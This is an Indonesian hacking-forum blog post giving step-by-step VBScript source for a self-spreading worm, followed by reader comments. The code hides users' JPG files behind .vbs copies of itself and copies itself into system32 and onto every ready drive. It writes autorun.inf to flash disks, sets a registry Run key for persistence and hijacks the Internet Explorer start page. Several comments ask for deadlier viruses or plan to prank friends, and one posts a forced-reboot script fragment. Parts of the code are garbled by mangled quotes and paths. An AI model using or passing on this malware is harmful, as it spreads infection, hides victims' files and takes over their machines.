Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Cara Membuat Virus Dengan Visual Basic

16 September 2010
Penulis:   · Kategori Artikel: Virus

BINUS HACKER Binus Hacker Is Not Criminal Banner





Cara Membuat Virus Menggunakan Visual Basic (VB)

Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut. Skenario virus tersebut adalah sebagai berikut:
1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer

Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas

Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub

2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.

Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & “” & “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub

3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan

Sub serangan_ie()
If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page”)<>”c:\windows\system32\wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page”,”c:\windows\system32\wolio.html”
End If
End Sub

4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus

Sub buat_html()
set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub

5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus

Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub

6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur

On Error Resume Next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)
myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″
fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio”)<>”c:\windows\system32\wolio.vbs”) Then
regedit.RegWrite
“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio”,”c:\windows\system32\wolio.vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()

Demikianlah artikel tentang cara pembuatan dan penuluran sebuah virus yang dibuat dengan VBS. Setelah mengetahui teknik penyebaran suatu virus yang dibuat dengan VBS, maka diharapkan kepada Anda agar dapat melakukan pencegahan. Virus yang kita pelajari kali ini sebenarnya hanya virus yang “KONYOL”, ini hanya membuka wacana Anda terhadap bahaya dari virus yang dibuat dengan VBS. Semoga artikel ini dapat bermanfaat.

Source: c o k e l a t n e t[dot]b l  o g s p o t[dot] c o m

Silakan Ber Eksperimen Dengan Ide-Ide yang lain, Cheers..

Jangan lupa untuk sharing kepada yang lain ya :)

BINUS HACKER Binus Hacker Chat and Forum

Komentar

57 Komentar Untuk “Cara Membuat Virus Dengan Visual Basic
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. Miko Jb pada 21 March 2011 7:03 pm

    ship.. bang akasi ye..

  2. Con4o pada 28 March 2011 4:52 am

    Bagus nih bang……..
    Thanksz yach….

    Visit Me !

  3. Andy Nak Makassar pada 30 March 2011 4:56 pm

    Cara buat Anti Virus nya Gan?………..

  4. Tio nak pemalang pada 3 April 2011 2:03 am

    cara wat antivirusnya gi5na ! seXan di posting ea om……..

  5. manhit007 pada 15 April 2011 11:12 pm

    ekstensi nya apa?

  6. rika pada 25 April 2011 9:07 am

    mas tolong kirimin secara detail cara membuat virus yang mematikan.
    kirim ke rikachamexs@ymail.com
    thxs

  7. mursid pada 29 April 2011 3:59 am

    bagus bos………………. kalau punya yang lain bagi-bagi ea………..hehe
    pi law bisa sekalian dong ama anti virusnya………..

  8. iam pada 1 May 2011 7:34 pm

    thks bang!!!

    kalau ada tutorial lengkap pdf/docNYA kirimin bang di email aku
    mrisalo@yahoo.com
    ato lampirkan di fbKU: ErrorDouble klik

    slm programmer!!!

  9. widi pada 3 May 2011 7:58 am

    thanks tuk ilmunya bang.

  10. Raihan pada 5 May 2011 6:28 am

    kk itu virus bisa di hapus gak?
    virusnya berbahaya gak?

  11. masmun pada 14 May 2011 4:12 pm

    muantap gan………
    langsung ke TKP

  12. ray pada 19 May 2011 1:30 am
  13. andry pada 21 May 2011 6:06 am

    bisa di kirim secara detail gan k email saya………

  14. riyu pada 22 May 2011 1:52 am

    trims ilmunya gan…

    Mania Visual Basic

  15. siswanto pada 11 June 2011 8:26 am

    wah wah ,.. keren gan,..

  16. alex pada 15 June 2011 3:30 am

    mantap gan….

  17. Kiyaz pada 16 June 2011 6:02 am

    nice job

  18. cupri pada 20 June 2011 9:42 pm

    cara pemakaian x gan msh bingung..?

  19. eky80 pada 1 July 2011 5:09 pm

    klo mau download visual basic ya dmna yaa…

  20. TAMnAel pada 4 July 2011 6:12 pm

    kk mo tnya dunk…
    klo mo buat virus kan
    apa ngk sebaik,a buat anti virus.a dlu yar ngk kena…
    ke com sendiri…
    bisa kasi tutor.a ngk??
    cara buat virus dan anti virus.a??!!

  21. candra pada 20 July 2011 7:43 pm

    klo bisa mw dnk d ajarin scra detail mas,,,,,

    candev@rocketmail.com

  22. berry anugrah pada 21 July 2011 2:44 am

    bwt apa nii bung

  23. azmi pada 8 August 2011 6:09 am

    send the manner of virion creation to my e- mail please

  24. dimas pada 11 August 2011 8:51 pm

    oke juga ni artikel…..

  25. nha pada 18 August 2011 2:32 am

    kk,kirimin script anti vir nya donk…
    ke email aku…

  26. nha pada 18 August 2011 2:34 am

    kirimin script anti vir nya,k emaill aku

  27. rifqi pada 19 August 2011 5:27 am

    kk… kalau bikin anti virusnya gimana??? tolong kirimin tutorial nya ke email aku..
    TM

  28. dudun pada 21 August 2011 10:13 pm

    aduhh pening baget cara belajar’a ,,,,
    ada yG mau ajarin gak ??

  29. bagus akbar pada 4 September 2011 1:23 am

    vbs ya?

  30. Newbie pada 22 October 2011 7:32 pm

    Takutnya nnti laptop sendiri yang terserang.. senjata makan tuan

  31. Vaishal pada 21 December 2011 12:16 am

    Kalau bwt Antivirus Gmana KK?

    Ajari via emailku dunk, .

  32. rio pada 23 December 2011 9:38 pm

    asik asikkk enakk nie buat kerjaainn kawan2 di kampuss haha

  33. yanti pada 8 February 2012 7:00 pm

    cara penggunaan_ a gmn?

  34. dodi pada 6 March 2012 2:14 am

    masukan antivirus kedalam Domin saya

  35. leri pada 15 March 2012 8:39 am

    yg mo nyari VB…
    banyak di GOOGLE..

    hahaha, peace bro…

  36. Anonymous pada 15 March 2012 8:44 am

    hah…

    dasar orang2x iseng, gak ada gunanya kan ngerjain teman…
    hanya membuat susah aja…

    Admin ni buat artikel ni untuk buat pembelajaran, bukan untuk ngerjain teman…

    jadi gak usah resek, mending belajar saja…

    we are Anonymous
    we are legion
    we do not forgive
    we do not forget
    expect us !!

  37. adittia pada 16 March 2012 2:58 am

    kirimin skipnya ya bang
    sekalian sering2 lah
    itung2 belajar bareng

  38. indrazambie pada 4 June 2012 9:31 pm

    sippp bozzz…….

  39. dertis pada 25 June 2012 1:24 am

    Gan Virus Komputer nya Pakai Tool Apa ?

  40. waluyo pada 15 October 2012 11:28 am

    kalau ada tutorial lengkap pdf/docNYA kirimin bang di email

    akuanamucuppribadi@yahoo.com

    bang,,,, makasih y ilmu sesatx,,

  41. NightMare pada 7 December 2012 11:23 pm

    quote from Waluyo: “bang,,,, makasih y ilmu sesatx,,”
    ilmu sesat?
    wkwkwkwk

    ada2 saja..pahami dulu :)

  42. muhammad fajar pada 1 February 2013 7:01 pm

    makasihh bang dhaa tutorial . . .
    kalauu ada lebihh banyakk lagii tolongg d bagii yaaa . . .
    nty tlong krim ke email quw jhaa fajarthedark@yahoo.co.id???
    tolong bimbingannya bang???tanks

  43. muhammad fajar pada 1 February 2013 7:02 pm

    makasihh bang atas tutorialnya . . .
    kalauu ada lebihh banyakk lagii tolongg d bagii yaaa . . .
    nty tlong krim ke email quw jhaa fajarthedark@yahoo.co.id???
    tolong bimbingannya bang???tanks

  44. Memed pada 10 February 2013 9:22 am

    Bang kita hrs pake notpade ya?
    Tolong kirim pesan di fb saya,
    “memed republik rasta”

  45. Memed pada 10 February 2013 9:26 am

    Bang kita hrs pake notpade ya?
    Tolong kirim pesan di fb saya, memed republik rasta

  46. david pada 12 February 2013 7:44 pm

    bos itu di pilih salah satu atau di gabungkan step satu sampe terakir bru di jalankan?ngax mudeng nich…maklum newbie

  47. Nugra pada 6 March 2013 12:54 am

    mas tolong kirimin secara detail cara membuat virus yang mematikan.
    kirim ke nugra_2002@ymail.com
    thxs

  48. Laxus Hacking pada 21 March 2013 12:19 am

    gimana cara makai visual basic nya, mohon di bantu

  49. Arie pada 21 March 2013 6:21 pm

    Thanks infonya..

  50. Peantist pada 11 April 2013 11:11 am

    Terima kasih atas sharing ilmunya.

  51. hermawan pada 21 May 2013 9:32 pm

    Bang mnta cara buat virus Ÿª♌g lengkap nya
    Sma cara buat penawar nya
    ‎⌣»⌣͡«̊͡♡̊͡»̊͡♥͡Thank You ♥͡ «̊͡♡̊͡»̊͡⌣͡«. Info nya…

  52. nicolas zikra pada 24 October 2013 2:02 am

    mas, mau nanya neh, itu sub serangan nya kan JPG, sedangkan ada lagi jenis serangan lain misalkan folder dan drive, nah, serangan lain itu apakah tempat mencari file sub serangan JPG atau menginfeksi keseluruhan file dalam folder atau drive itu?
    mohon di jawab… ^_^

  53. Maya pada 11 January 2014 6:55 am

    Inimah Masih terlalu biasa,, Punya saya kalau di tularin otomatis ngehapus File system.. terlebih khusus ke data2 booting… dan OS.. dijamin Pc / laptop Anda yb memakai OS win 7 gag bakal selamat kalo kena virus saya….. gag langsung kerasa… mulai menghapusnya dikit2..

    ======>>>>>> Anda bisa Stresss <<<<<<<========

    unload me

  54. Maya pada 11 January 2014 7:01 am

    Private sub Bantai()
    **************
    *************************
    ********************************
    ****************************
    x=msgbox “Data Anda Akan Segera Terbantai”,vbYesNo+vbexlamation,”Warning”
    if x = ybyes then
    ****************************
    ******
    shell(shutdown -r -t00)
    *****************
    *****************
    else
    msgbox “Mampossssss”,,”wkwkkw”
    exit sub
    end sub

    Yg mau tau kodingnya sms ke 085284863654
    Saya bisa kasi tau cara bikin Penangkalnya Juga kikikiikkiki :D

  55. dedy mandala pada 23 January 2014 12:24 pm

    makasih mas dengan artikelnya saya berharap saya bisa pintar seperti mas
    oy mas saya pengen nanya cara membobol password winxp gimana mas ?
    nanti jawabanya di kirim aja di email aku pmandala40@yahoo.co.id

  56. Pembaca pada 20 June 2014 8:46 pm

    Kamu pintar, sayang kepintaran diarahkan untuk membuat yang negatif, andai saja anda membuat aplikasi itu untuk menangkal semua virus yang ada, bukan menciptakan virus,…

    Selain kamu mengembangkan kepintaran, saya yakin ilmu kamu akan menjadi suatu amal yang berguna jika diarahkan ke hal yang lebih berguna. Tanpa disadari kamu akan di doakan panjang umur dan artikel kamu akan selalu di nanti karena semua pihak merasa diuntungkan.

  57. danu pada 8 September 2014 6:30 pm

    Mas tolong kririmin codingan virus’a dong dna sekalian anti virus’a yah

Silahkan Berikan Tanggapan Anda...